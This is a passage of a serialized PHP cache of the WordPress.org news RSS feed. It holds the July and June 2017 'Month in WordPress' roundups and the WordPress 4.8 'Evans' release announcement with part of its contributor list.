+0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4885";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:344:"After a particularly busy month in June, things settled down a bit in the WordPress world — WordPress 4.8’s release went very smoothly, allowing the Core team to build up some of the community infrastructure around development. Read on for more interesting news from around the WordPress world in July. Weekly meeting for new core [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:5644:"<p>After a particularly busy month <a href="https://wordpress.org/news/2017/07/the-month-in-wordpress-june-2017/">in June</a>, things settled down a bit in the WordPress world — WordPress 4.8’s release went very smoothly, allowing the Core team to build up some of the community infrastructure around development. Read on for more interesting news from around the WordPress world in July.</p>\n<hr />\n<h2>Weekly meeting for new core contributors</h2>\n<p>Onboarding new contributors is a persistent issue for most WordPress contribution teams. While every team welcomes any new contributors, the path to getting deeply involved can be tricky to find at times.</p>\n<p>This month, the Core team implemented a fantastic new initiative: <a href="https://make.wordpress.org/core/2017/06/30/announcing-a-weekly-new-contributors-meeting/">weekly meetings for new core contributors</a> as a way to encourage involvement and foster fresh contributions. The meetings not only focus on bugs suited to first-time contributors, they also make space for experienced contributors to help out individuals who may be new to developing WordPress core.</p>\n<p>The meetings are held every Wednesday at 19:00 UTC in the #core channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>.</p>\n<h2>Increased focus on PHP practices in WordPress core</h2>\n<p>In bringing people together to improve WordPress core, a new channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a> named #core-php is designed to focus on PHP development in the project.</p>\n<p>Along with this increased concentration on PHP, a <a href="https://make.wordpress.org/core/2017/07/06/announcement-for-weekly-php-meetings/">new weekly meeting is now taking place</a> every Monday at 18:00 UTC in #core-php to improve WordPress core’s PHP practices.</p>\n<h2>Sharp rise in meetup group growth</h2>\n<p>The dashboard events widget in WordPress 4.8 displays local, upcoming WordPress events for the logged in user. The events listed in this widget are pulled from the <a href="https://www.meetup.com/pro/wordpress/">meetup chapter program</a>, as well as the <a href="https://central.wordcamp.org/schedule">WordCamp schedule</a>.</p>\n<p>This widget provides greater visibility of official WordPress events, and encourages community involvement in these events. It’s safe to say that the widget has achieved its goals admirably — since WordPress 4.8 was released a little over a month ago, 31 new meetup groups have been formed with 15,647 new members across the whole program. This is compared to 19 new groups and only 7,071 new members in the same time period last year.</p>\n<p>You can find a local meetup group to join <a href="https://www.meetup.com/pro/wordpress/">on meetup.com</a>, and if you would like to get involved in organizing events for your community, you can find out more about the inner workings of the program <a href="https://make.wordpress.org/community/meetups/">on the Community Team site</a> or by joining the #community-events channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>.</p>\n<h2>WordPress 4.8.1 due for imminent release</h2>\n<p>WordPress 4.8 cycle’s first maintenance release will be published in the coming week, more than a month after 4.8 was released. This release fix some important issues in WordPress core and the majority of users will find that their sites will update to this new version automatically.</p>\n<p>If you would like to help out by testing this release before it goes live, you can follow the <a href="https://make.wordpress.org/core/handbook/testing/beta/">beta testing guide</a> for WordPress core. To get further involved in building WordPress core, jump into the #core channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>, and follow <a href="https://make.wordpress.org/core/">the Core team blog</a>.</p>\n<hr />\n<h2>Further reading:</h2>\n<ul>\n<li>The WordPress mobile apps have been updated with <a href="https://en.blog.wordpress.com/2017/07/24/a-brand-new-editor-for-the-wordpress-mobile-apps/">a brand new text editor</a>.</li>\n<li>In a recent push to encourage WordPress users to upgrade their PHP versions, two features have been proposed &#8211; one <a href="https://core.trac.wordpress.org/ticket/41191">to provide a notice to users</a> and another to <a href="https://core.trac.wordpress.org/ticket/40934">allow PHP version requirements to be specified by plugins and themes</a>.</li>\n<li>John Maeda wrote <a href="https://make.wordpress.org/design/2017/07/14/whywordpress2/">a great post</a> celebrating the freedom that WordPress offers.</li>\n<li>Gutenberg, the new text editor for WordPress, is <a href="https://make.wordpress.org/core/2017/07/28/whats-new-in-gutenberg-28th-july/">in continual development</a> — everyone is invited to <a href="https://make.wordpress.org/test/handbook/call-for-testing/gutenberg-testing/">test it out</a>.</li>\n<li>The WordPress Meta team is starting <a href="https://make.wordpress.org/meta/2017/07/26/experiment-wordcamp-org-bug-scrubs/">a new initiative</a> to bring the community together to focus on fixing bugs across the WordCamp.org network.</li>\n<li>Volunteer applications for WordCamp US <a href="https://2017.us.wordcamp.org/2017/08/01/wcus-needs-you-volunteer-applications-are-now-open/">are now open</a>.</li>\n</ul>\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href="https://make.wordpress.org/community/month-in-wordpress-submissions/">submit it here</a>.</em></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4885";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:33:"The Month in WordPress: June 2017";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:68:"https://wordpress.org/news/2017/07/the-month-in-wordpress-june-2017/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Mon, 03 Jul 2017 11:42:11 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:18:"Month in WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4865";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:342:"We&#8217;re starting a new regular feature on this blog today. We&#8217;d like to keep everyone up-to-date about the happenings all across the WordPress open source project and highlight how you can get involved, so we&#8217;ll be posting a roundup of all the major WordPress news at the end of every month. Aside from other general [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Hugh Lashbrooke";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:9225:"<p><i>We&#8217;re starting a new regular feature on this blog today. We&#8217;d like to keep everyone up-to-date about the happenings all across the WordPress open source project and highlight how you can get involved, so we&#8217;ll be posting a roundup of all the major WordPress news at the end of every month.</i></p>\n<p>Aside from other general news, the three big events in June were the release of WordPress 4.8, WordCamp Europe 2017, and the WordPress Community Summit. Read on to hear more about these as well as other interesting stories from around the WordPress world.</p>\n<hr />\n<h2>WordPress 4.8</h2>\n<p>On June 8, a week before the Community Summit and WordCamp Europe,<a href="https://wordpress.org/news/2017/06/evans/"> WordPress 4.8 was released</a>.You can read<a href="https://make.wordpress.org/core/2017/05/26/wordpress-4-8-field-guide/"> the Field Guide</a> for a comprehensive overview of all the features of this release (the News and Events widget in the dashboard is one of the major highlights).</p>\n<p>Most people would either have their version auto-updated, or their hosts would have updated it for them. For the rest, the updates have gone smoothly with no major issues reported so far.</p>\n<p>This WordPress release saw contributions from 346 individuals; you can find their names in <a href="https://wordpress.org/news/2017/06/evans/">the announcement post</a>. To get involved in building WordPress core, jump into the #core channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>, and follow <a href="https://make.wordpress.org/core/">the Core team blog</a>.</p>\n<h2>WordCamp Europe 2017</h2>\n<p><a href="https://2017.europe.wordcamp.org/">WordCamp Europe 2017</a> was held in Paris between June 15-17. The event began with a Contributor Day, followed by two days of talks and community goodness. The talks were live-streamed, but you can still catch all the recordings <a href="http://wordpress.tv/event/wordcamp-europe-2017/">on WordPress.tv</a>. The organisers also published <a href="https://2017.europe.wordcamp.org/2017/06/30/wordcamp-europe-2017-in-paris-its-a-wrap/">a handy wrap-up of the event</a>.</p>\n<p>WordCamp Europe exists to bring together the WordPress community from all over the continent, as well as to inspire local communities everywhere to get their own events going — to that end, the event was a great success, as a host of new meetup groups have popped up in the weeks following WordCamp Europe.</p>\n<p>The work that Contributor Day participants accomplished was both varied and valuable, covering all aspects of the WordPress project — have a look through <a href="https://make.wordpress.org/">the Make blogs</a> for updates from each team.</p>\n<p>Finally, we also learned during the event that <a href="https://2017.europe.wordcamp.org/2017/06/17/belgrade-serbia-to-host-wordcamp-europe-2018/">WordCamp Europe 2018 will be held in Belgrade, Serbia</a>, continuing the tradition of exploring locations and communities across the continent.</p>\n<h2>WordPress Community Summit</h2>\n<p>The fourth WordPress Community Summit took place during the two days leading up to WordCamp Europe 2017. This event is an invite-only unconference where people from all over the WordPress community come together to discuss some of the more difficult issues in the community, as well as to make plans for the year ahead in each of the contribution teams.</p>\n<p>As the Summit is designed to be a safe space for all attendees, the notes from each discussion are in the process of being anonymized before we publish them on <a href="https://make.wordpress.org/summit/">the Summit blog</a> (so stay tuned &#8211; they’ll show up there over the next few weeks).</p>\n<p>You can already see the final list of topics that were proposed for the event <a href="https://make.wordpress.org/summit/2017/06/10/community-summit-2017-final-list-of-topic/">here</a> (although a few more were added during the course of the two day Summit).</p>\n<h2>WordPress marketing push continues apace</h2>\n<p>As part of the push to be more intentional in marketing WordPress (as per Matt Mullenweg&#8217;s <a href="http://wordpress.tv/2016/12/07/matt-mullenweg-state-of-the-word-2016/">2016 State of the Word</a>), the Marketing team has launched two significant drives to obtain more information about who uses WordPress and how that information can shape their outreach and messaging efforts.</p>\n<p><a href="https://make.wordpress.org/marketing/2017/06/15/wordpress-case-studies-and-usage-survey/">The team is looking for WordPress case studies</a> and is asking users, agencies, and freelancers to take a WordPress usage survey. This will go a long way towards establishing a marketing base for WordPress as a platform and as a community — and many people in the community are looking forward to seeing this area develop further.</p>\n<p>To get involved in the WordPress Marketing team, you can visit <a href="https://make.wordpress.org/marketing/">their team blog</a>.</p>\n<h2>New Gutenberg editor available for testing</h2>\n<p>For some time now, the Core team has been hard at work on a brand-new text editor for WordPress — this project has been dubbed “Gutenberg.” The project’s ultimate goal is to replace the existing TinyMCE editor, but for now it is in beta and available for public testing — <a href="https://wordpress.org/plugins/gutenberg/">you can download it here as a plugin</a> and install it on any WordPress site.</p>\n<p>This feature is still in beta, so we don’t recommend using it on a production site. If you test it out, though, you’ll find that it is a wholly different experience to what you are used to in WordPress. It’s a more streamlined, altogether cleaner approach to the text-editing experience than we’ve had before, and something that many people are understandably excited about. Matt Mullenweg discussed the purpose of Gutenberg in more detail during <a href="http://wordpress.tv/2017/07/01/interview-and-qanda-with-matt-mullenweg/">his Q&amp;A at WordCamp Europe</a>.</p>\n<p>There are already a few reviews out from <a href="https://kinsta.com/blog/gutenberg-wordpress-editor/">Brian Jackson at Kinsta</a>, <a href="https://daily.jorb.in/2017/06/random-thoughts-on-gutenberg/">Aaron Jorbin</a>, and <a href="https://www.mattcromwell.com/gutenberg-first-impressions/">Matt Cromwell</a> (among many others). Keep in mind that the project is in constant evolution at this stage; when it eventually lands in WordPress core (probably in v5.0), it could look very different from its current iteration — that’s what makes this beta stage and user testing so important.</p>\n<p>To get involved with shaping the future of Gutenberg, please <a href="https://make.wordpress.org/test/handbook/call-for-testing/gutenberg-testing/">test it out</a>, and join the #core-editor channel in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a>. You can also visit <a href="https://github.com/WordPress/gutenberg">the project’s GitHub repository</a> to report issues and contribute to the codebase.</p>\n<hr />\n<h2>Further reading:</h2>\n<ul>\n<li style="font-weight: 400">Bridget Willard <a href="https://make.wordpress.org/community/2017/06/21/proposed-wordcamp-editorial-calendar/">has proposed an editorial calendar</a> to assist WordCamp organizers with publishing content for their event.</li>\n<li style="font-weight: 400">A new kind of niche WordCamp, <a href="https://2017-denver.journalist.wordcamp.org/">WordCamp for Publishers in Denver</a>, has opened ticket sales.</li>\n<li style="font-weight: 400">The WordPress iOS app was updated with <a href="https://en.blog.wordpress.com/2017/06/21/an-all-new-media-library-for-the-wordpress-ios-app/">a fresh, new media library</a> this month.</li>\n<li style="font-weight: 400">It looks like <i>Underscores</i>, the popular WordPress starter theme, <a href="https://themeshaper.com/2017/06/26/the-future-of-underscores-and-a-new-committer/">has a bright future ahead of it</a>, with a renewed vision and new committer.</li>\n<li style="font-weight: 400">The always-inspiring Tom McFarlin <a href="https://tommcfarlin.com/simple-autoloader-for-wordpress">has released a simple autoloader for WordPress</a> that looks very useful indeed.</li>\n<li style="font-weight: 400">After a bit of a discussion on Twitter regarding the differences between WordPress.org, WordPress.com, and Jetpack, <a href="https://helen.wordpress.com/2017/06/21/restaurant-vs-meal-kit-vs-grocery-shopping-or-wordpress-com-vs-jetpack-vs-wordpress-org/">Helen Hou-Sandí came up with a great analogy</a> and an interesting post about it all.</li>\n<li style="font-weight: 400">If you’re interested in contributing specifically to the JavaScript or PHP areas of the WordPress core codebase, then the new #core-js and #core-php channels in the <a href="https://make.wordpress.org/chat/">Making WordPress Slack group</a> are perfect for you.</li>\n</ul>\n<p><i>If you have a story we should consider including in the next “Month in WordPress” post, please </i><a href="https://make.wordpress.org/community/month-in-wordpress-submissions/"><i>submit it here</i></a><i>.</i></p>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:30:"com-wordpress:feed-additions:1";a:1:{s:7:"post-id";a:1:{i:0;a:5:{s:4:"data";s:4:"4865";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:33:"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:25:"WordPress 4.8 “Evans”";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:41:"https://wordpress.org/news/2017/06/evans/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 08 Jun 2017 14:49:30 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:1:{i:0;a:5:{s:4:"data";s:8:"Releases";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:34:"https://wordpress.org/news/?p=4770";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:373:"An Update with You in Mind Gear up for a more intuitive WordPress! Version 4.8 of WordPress, named &#8220;Evans&#8221; in honor of jazz pianist and composer William John &#8220;Bill&#8221; Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand. Though some [&#8230;]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:14:"Matt Mullenweg";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:43005:"<h2 style="text-align: center">An Update with You in Mind</h2>\n<p><img class="aligncenter size-large wp-image-4816" src="https://i0.wp.com/wordpress.org/news/files/2017/06/release-featured-image.png?resize=632%2C316&#038;ssl=1" alt="" srcset="https://i0.wp.com/wordpress.org/news/files/2017/06/release-featured-image.png?resize=1024%2C512&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2017/06/release-featured-image.png?resize=300%2C150&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2017/06/release-featured-image.png?resize=768%2C384&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2017/06/release-featured-image.png?w=1264&amp;ssl=1 1264w, https://i0.wp.com/wordpress.org/news/files/2017/06/release-featured-image.png?w=1896&amp;ssl=1 1896w" sizes="(max-width: 632px) 100vw, 632px" data-recalc-dims="1" /></p>\n<h3>Gear up for a more intuitive WordPress!</h3>\n<p>Version 4.8 of WordPress, named &#8220;Evans&#8221; in honor of jazz pianist and composer William John &#8220;Bill&#8221; Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand.</p>\n<p>Though some updates seem minor, they’ve been built by hundreds of contributors with <em>you</em> in mind. Get ready for new features you’ll welcome like an old friend: link improvements, <em>three</em> new media widgets covering images, audio, and video, an updated text widget that supports visual editing, and an upgraded news section in your dashboard which brings in nearby and upcoming WordPress events.</p>\n<hr />\n<h2 style="text-align: center">Exciting Widget Updates</h2>\n<p><img class="size-large wp-image-4776 aligncenter" src="https://i1.wp.com/wordpress.org/news/files/2017/06/widgets-with-all-four.png?resize=632%2C436&#038;ssl=1" alt="" srcset="https://i1.wp.com/wordpress.org/news/files/2017/06/widgets-with-all-four.png?resize=1024%2C706&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2017/06/widgets-with-all-four.png?resize=300%2C207&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2017/06/widgets-with-all-four.png?resize=768%2C530&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2017/06/widgets-with-all-four.png?w=1264&amp;ssl=1 1264w" sizes="(max-width: 632px) 100vw, 632px" data-recalc-dims="1" /></p>\n<h3>Image Widget</h3>\n<p>Adding an image to a widget is now a simple task that is achievable for any WordPress user without needing to know code. Simply insert your image right within the widget settings. Try adding something like a headshot or a photo of your latest weekend adventure — and see it appear automatically.</p>\n<h3>Video Widget</h3>\n<p>A welcome video is a great way to humanize the branding of your website. You can now add any video from the Media Library to a sidebar on your site with the new Video widget. Use this to showcase a welcome video to introduce visitors to your site or promote your latest and greatest content.</p>\n<h3>Audio Widget</h3>\n<p>Are you a podcaster, musician, or avid blogger? Adding a widget with your audio file has never been easier. Upload your audio file to the Media Library, go to the widget settings, select your file, and you’re ready for listeners. This would be a easy way to add a more personal welcome message, too!</p>\n<h3>Rich Text Widget</h3>\n<p>This feature deserves a parade down the center of town! Rich-text editing capabilities are now native for Text widgets. Add a widget anywhere and format away. Create lists, add emphasis, and quickly and easily insert links. Have fun with your newfound formatting powers, and watch what you can accomplish in a short amount of time.</p>\n<hr />\n<h2 style="text-align: center">Link Boundaries</h2>\n<div id="v-8BDWH3QG-1" class="video-player"><video id="v-8BDWH3QG-1-video" width="632" height="342" poster="https://videos.files.wordpress.com/8BDWH3QG/3-link-boundaries_dvd.original.jpg" controls="true" preload="metadata" dir="ltr" lang="en"><source src="https://videos.files.wordpress.com/8BDWH3QG/3-link-boundaries_dvd.mp4" type="video/mp4; codecs=&quot;avc1.64001E, mp4a.40.2&quot;" /><source src="https://videos.files.wordpress.com/8BDWH3QG/3-link-boundaries_fmt1.ogv" type="video/ogg; codecs=&quot;theora, vorbis&quot;" /><div><img alt="Link Boundaries" src="https://videos.files.wordpress.com/8BDWH3QG/3-link-boundaries_dvd.original.jpg?resize=632%2C342" data-recalc-dims="1" /></div><p>Link Boundaries</p></video></div>\n<p>Have you ever tried updating a link, or the text around a link, and found you can&#8217;t seem to edit it correctly? When you edit the text after the link, your new text also ends up linked. Or you edit the text in the link, but your text ends up outside of it. This can be frustrating! With link boundaries, a great new feature, the process is streamlined and your links will work well. You’ll be happier. We promise.</p>\n<hr />\n<h2 style="text-align: center">Nearby WordPress Events</h2>\n<p><img class="aligncenter wp-image-4779 size-large" src="https://i2.wp.com/wordpress.org/news/files/2017/06/events-widget.png?resize=632%2C465&#038;ssl=1" alt="" srcset="https://i2.wp.com/wordpress.org/news/files/2017/06/events-widget.png?resize=1024%2C753&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2017/06/events-widget.png?resize=300%2C221&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2017/06/events-widget.png?resize=768%2C565&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2017/06/events-widget.png?w=1126&amp;ssl=1 1126w" sizes="(max-width: 632px) 100vw, 632px" data-recalc-dims="1" /></p>\n<p>Did you know that WordPress has a thriving offline community with groups meeting regularly in more than 400 cities around the world? WordPress now draws your attention to the events that help you continue improving your WordPress skills, meet friends, and, of course, publish!</p>\n<p>This is quickly becoming one of our favorite features. While you are in the dashboard (because you’re running updates and writing posts, right?) all upcoming WordCamps and official WordPress Meetups — local to you — will be displayed.</p>\n<p>Being part of the community can help you improve your WordPress skills and network with people you wouldn&#8217;t otherwise meet. Now you can easily find your local events just by logging in to your dashboard and looking at the new Events and News dashboard widget.</p>\n<hr />\n<h2 style="text-align: center">Even More Developer Happiness <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f60a.png" alt="😊" class="wp-smiley" style="height: 1em; max-height: 1em;" /></h2>\n<h3><a href="https://make.wordpress.org/core/2017/05/17/cleaner-headings-in-the-admin-screens/">More Accessible Admin Panel Headings</a></h3>\n<p>New CSS rules mean extraneous content (like “Add New” links) no longer need to be included in admin-area headings. These panel headings improve the experience for people using assistive technologies.</p>\n<h3><a href="https://make.wordpress.org/core/2017/05/22/removal-of-core-embedding-support-for-wmv-and-wma-file-formats/">Removal of Core Support for WMV and WMA Files</a></h3>\n<p>As fewer and fewer browsers support Silverlight, file formats which require the presence of the Silverlight plugin are being removed from core support. Files will still display as a download link, but will no longer be embedded automatically.</p>\n<h3><a href="https://make.wordpress.org/core/2017/05/22/multisite-focused-changes-in-4-8/">Multisite Updates</a></h3>\n<p>New capabilities have been introduced to 4.8 with an eye towards removing calls to<br />\n<code>is_super_admin()</code>. Additionally, new hooks and tweaks to more granularly control site and user counts per network have been added.</p>\n<h3><a href="https://make.wordpress.org/core/2017/05/23/addition-of-tinymce-to-the-text-widget/">Text-Editor JavaScript API</a></h3>\n<p>With the addition of TinyMCE to the text widget in 4.8 comes a new JavaScript API for instantiating the editor after page load. This can be used to add an editor instance to any text area, and customize it with buttons and functions. Great for plugin authors!</p>\n<h3><a href="https://make.wordpress.org/core/2017/05/26/media-widgets-for-images-video-and-audio/">Media Widgets API</a></h3>\n<p>The introduction of a new base media widget REST API schema to 4.8 opens up possibilities for even more media widgets (like galleries or playlists) in the future. The three new media widgets are powered by a shared base class that covers most of the interactions with the media modal. That class also makes it easier to create new media widgets and paves the way for more to come.</p>\n<h3><a href="https://make.wordpress.org/core/2017/05/16/customizer-sidebar-width-is-now-variable/">Customizer Width Variable</a></h3>\n<p>Rejoice! New responsive breakpoints have been added to the customizer sidebar to make it wider on high-resolution screens. Customizer controls should use percentage-based widths instead of pixels.</p>\n<hr />\n<h2 style="text-align: center">The Squad</h2>\n<p>This release was led by <a href="https://matt.blog">Matt</a> and <a href="https://profiles.wordpress.org/jbpaul17">Jeff Paul</a>, with the help of the following fabulous folks. There are 346 contributors with props in this release, with 106 of them contributing for the first time. Pull up some Bill Evans on your music service of choice, and check out some of their profiles:</p>\n<a href="https://profiles.wordpress.org/aaroncampbell">Aaron D. Campbell</a>, <a href="https://profiles.wordpress.org/jorbin">Aaron Jorbin</a>, <a href="https://profiles.wordpress.org/abrightclearweb">abrightclearweb</a>, <a href="https://profiles.wordpress.org/ibachal">Achal Jain</a>, <a href="https://profiles.wordpress.org/achbed">achbed</a>, <a href="https://profiles.wordpress.org/acmethemes">Acme Themes</a>, <a href="https://profiles.wordpress.org/adamsilverstein">Adam Silverstein</a>, <a href="https://profiles.wordpress.org/adammacias">adammacias</a>, <a href="https://profiles.wordpress.org/mrahmadawais">Ahmad Awais</a>, <a href="https://profiles.wordpress.org/ahmadawais">ahmadawais</a>, <a href="https://profiles.wordpress.org/airesvsg">airesvsg</a>, <a href="https://profiles.wordpress.org/ajoah">ajoah</a>, <a href="https://profiles.wordpress.org/akibjorklund">Aki Bj&#246;rklund</a>, <a href="https://profiles.wordpress.org/akshayvinchurkar">akshayvinchurkar</a>, <a href="https://profiles.wordpress.org/schlessera">Alain Schlesser</a>, <a href="https://profiles.wordpress.org/xknown">Alex Concha</a>, <a href="https://profiles.wordpress.org/xavortm">Alex Dimitrov</a>, <a href="https://profiles.wordpress.org/ironpaperweight">Alex Hon</a>, <a href="https://profiles.wordpress.org/alex27">alex27</a>, <a href="https://profiles.wordpress.org/allancole">allancole</a>, <a href="https://profiles.wordpress.org/arush">Amanda Rush</a>, <a href="https://profiles.wordpress.org/afercia">Andrea Fercia</a>, <a href="https://profiles.wordpress.org/andrewp-2">Andreas Panag</a>, <a href="https://profiles.wordpress.org/nacin">Andrew Nacin</a>, <a href="https://profiles.wordpress.org/azaozz">Andrew Ozz</a>, <a href="https://profiles.wordpress.org/rarst">Andrey "Rarst" Savchenko</a>, <a href="https://profiles.wordpress.org/andizer">Andy Meerwaldt</a>, <a href="https://profiles.wordpress.org/kelderic">Andy Mercer</a>, <a href="https://profiles.wordpress.org/andy">Andy Skelton</a>, <a href="https://profiles.wordpress.org/aniketpant">Aniket Pant</a>, <a href="https://profiles.wordpress.org/anilbasnet">Anil Basnet</a>, <a href="https://profiles.wordpress.org/ankit-k-gupta">Ankit K Gupta</a>, <a href="https://profiles.wordpress.org/ahortin">Anthony Hortin</a>, <a href="https://profiles.wordpress.org/antisilent">antisilent</a>, <a href="https://profiles.wordpress.org/atimmer">Anton Timmermans</a>, <a href="https://profiles.wordpress.org/apokalyptik">apokalyptik</a>, <a href="https://profiles.wordpress.org/artoliukkonen">artoliukkonen</a>, <a href="https://profiles.wordpress.org/ideag">Arunas Liuiza</a>, <a href="https://profiles.wordpress.org/attitude">attitude</a>, <a href="https://profiles.wordpress.org/backermann">backermann</a>, <a href="https://profiles.wordpress.org/b-07">Bappi</a>, <a href="https://profiles.wordpress.org/bcole808">Ben Cole</a>, <a href="https://profiles.wordpress.org/quasel">Bernhard Gronau</a>, <a href="https://profiles.wordpress.org/kau-boy">Bernhard Kau</a>, <a href="https://profiles.wordpress.org/binarymoon">binarymoon</a>, <a href="https://profiles.wordpress.org/birgire">Birgir Erlendsson (birgire)</a>, <a href="https://profiles.wordpress.org/bjornw">BjornW</a>, <a href="https://profiles.wordpress.org/bobbingwide">bobbingwide</a>, <a href="https://profiles.wordpress.org/boblinthorst">boblinthorst</a>, <a href="https://profiles.wordpress.org/boboudreau">boboudreau</a>, <a href="https://profiles.wordpress.org/gitlost">bonger</a>, <a href="https://profiles.wordpress.org/boonebgorges">Boone B. Gorges</a>, <a href="https://profiles.wordpress.org/bradyvercher">Brady Vercher</a>, <a href="https://profiles.wordpress.org/brainstormforce">Brainstorm Force</a>, <a href="https://profiles.wordpress.org/kraftbj">Brandon Kraft</a>, <a href="https://profiles.wordpress.org/brianhogg">Brian Hogg</a>, <a href="https://profiles.wordpress.org/krogsgard">Brian Krogsgard</a>, <a href="https://profiles.wordpress.org/bronsonquick">Bronson 